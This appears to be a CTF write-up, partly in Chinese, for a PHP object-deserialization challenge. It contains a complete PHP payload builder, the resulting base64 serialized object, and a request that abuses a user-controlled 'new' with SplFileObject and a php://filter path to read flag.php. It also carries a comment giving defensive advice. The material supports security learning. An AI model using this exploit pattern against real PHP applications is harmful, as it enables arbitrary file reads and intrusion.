要调用 IPO(),需通过 new $_POST['a']($_POST['b']) 实例化原生类 SplFileObject 来读取文件
SplFileObject类为文件提供了一个面向对象接口
需要满足下列条件:
$this->headmaster == 'ong'
$this->department->hahaha()
同时绕过 if($this->leader->name != 'ing' or $this->leader->rank !='department')
<?php
// Stand-in for the `teacher` class; presumably mirrors the class of the same
// name in the challenge source, which is not shown here. Only the property
// layout is declared: serialize() records the class name plus each property's
// name, visibility and value, so no methods are needed to build the graph.
class teacher{
// Defaults equal the two literals in the check quoted in the notes
// (`$this->leader->name != 'ing' or $this->leader->rank != 'department'`).
public $name = 'ing';
public $rank = 'department';
// Private and never assigned: it serializes as null under the NUL-delimited
// key "\0teacher\0salary", which is the s:15 entry in the recorded output.
private $salary;
}
// Stand-in for the `classroom` class; presumably mirrors the challenge source
// (not shown here). An instance is stored in school::$department below.
class classroom{
public $name = 'one class';
// Receives a teacher instance in the script below.
// NOTE(review): the notes' leader->name / leader->rank check presumably reads
// this property from inside classroom — confirm against the challenge source.
public $leader;
}
// Stand-in for the `school` class and root of the serialized object graph;
// presumably mirrors the challenge source (not shown here).
class school{
// Holds the classroom instance; the notes list `$this->department->hahaha()`
// as the call made through this property.
public $department;
// Default equals the literal in the listed condition `$this->headmaster == 'ong'`.
public $headmaster= 'ong';
}
// Assemble the nested graph school -> classroom -> teacher from the inside
// out, then print it serialized and base64-encoded (the serialized form
// contains NUL bytes from the private property key).
// NOTE(review): the defensive takeaway is that whoever supplies the string
// handed to unserialize() chooses the classes and property values of the
// result, so equality checks on those properties give no protection. Decode
// request data with json_decode() instead, or pass
// ['allowed_classes' => false] to unserialize(), and never derive the class
// name for `new` from a request parameter.
$leader = new teacher();
$room = new classroom();
$room -> leader = $leader;
$root = new school();
$root -> department = $room;
$encoded = base64_encode(serialize($root));
echo $encoded;
//Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9
get: ?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9 POST: a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php
